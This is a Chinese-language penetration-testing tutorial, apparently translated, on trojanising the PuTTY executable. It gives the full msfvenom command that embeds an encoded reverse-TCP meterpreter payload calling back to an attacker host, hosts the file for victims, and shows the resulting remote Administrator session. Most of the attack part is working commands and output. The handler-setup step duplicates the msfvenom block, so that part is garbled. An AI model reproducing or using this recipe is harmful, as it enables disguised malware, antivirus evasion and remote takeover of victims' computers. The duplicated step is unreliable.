seo优化_前端开发_渗透技术创建定制的后门可执行文件通常需要很长时间才能作为攻击者手动完成。在您想要的任何可执行文件中嵌入Metasploit有效负载的能力简直很棒。当我们说任何可执行文件时,它表示任何可执行文件。您想后门下载从互联网下载的内容吗?iexplorer呢?或explorer.exe或腻子,任何一种都可以。最好的部分是它非常简单。首先,我们下载合法的可执行文件(在本例中为流行的PuTTY客户端)。
root@kali:/var/www# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
--2015-07-21 12:01:27-- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
Resolving the.earth.li (the.earth.li)... 46.43.34.31, 2001:41c8:10:b1f:c0ff:ee:15:900d
Connecting to the.earth.li (the.earth.li)|46.43.34.31|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://the.earth.li/~sgtatham/putty/0.64/x86/putty.exe [following]
--2015-07-21 12:01:27-- http://the.earth.li/~sgtatham/putty/0.64/x86/putty.exe
Reusing existing connection to the.earth.li:80.
HTTP request sent, awaiting response... 200 OK
Length: 524288 (512K) [application/x-msdos-program]
Saving to: `putty.exe'
100%[=========================================================================================================>] 524,288 815K/s in 0.6s
2015-07-21 12:01:28 (815 KB/s) - `putty.exe' saved [524288/524288]
root@kali:/var/www#
接下来,我们使用msfvenom 将meterpreter反向有效负载注入到我们的可执行文件中,使用shikata_ga_nai对其进行三次编码,并将后门文件保存到我们的webroot目录中。
root@kali:/var/www# msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai succeeded with size 380 (iteration=2)
x86/shikata_ga_nai chosen with final size 380
Payload size: 380 bytes
Saved as: puttyX.exe
root@kali:/var/www#
由于我们选择了一个反向的meterpreter shell,因此我们需要设置漏洞利用处理程序来处理与攻击机器的连接。
root@kali:/var/www# msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai succeeded with size 380 (iteration=2)
x86/shikata_ga_nai chosen with final size 380
Payload size: 380 bytes
Saved as: puttyX.exe
root@kali:/var/www#
一旦受害者下载并执行了特殊版本的PuTTY,我们就会在目标上看到一个meterpeter shell。
[*] Sending stage (749056 bytes) to 192.168.1.201
[*] Meterpreter session 1 opened (192.168.1.101:443 -> 192.168.1.201:1189) at Sat Feb 05 08:54:25 -0700 2011
meterpreter > getuid
Server username: XEN-XP-SPLOIT\Administrator
meterpreter >
